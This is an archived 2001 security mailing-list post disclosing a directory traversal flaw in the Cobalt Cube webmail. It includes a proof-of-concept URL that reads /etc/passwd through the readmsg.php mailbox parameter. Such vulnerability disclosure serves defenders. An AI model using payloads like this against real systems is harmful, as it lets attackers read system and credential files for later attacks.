OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: KF (dotslashsnosoft.com)
Date: Thu Jul 05 2001 - 02:41:50 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    I just got a new Cobalt Cube today and I have been poking around at it
    for security issues... I noticed this minor issue in the webmail system.
    Your
    users are not aloud to have shell access by default however if they
    malform their mailbox requests they can read local files with the perms
    of the webserver. If your users have shell access they will not really
    be gaining anything however this could be used to remotely gather
    information for a future attack.

    [admin admin]$ uname -a
    Linux cube.ckfr.com 2.2.16C7 #1 Fri Sep 8 15:58:03 PDT 2000 i586 unknown
    [admin admin]$ cat /etc/issue
     
    Cobalt Linux release 6.0 (Carmel)
    Kernel 2.2.16C7 on an i586

    http://YOURCOBALTBOX:444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1

    -KF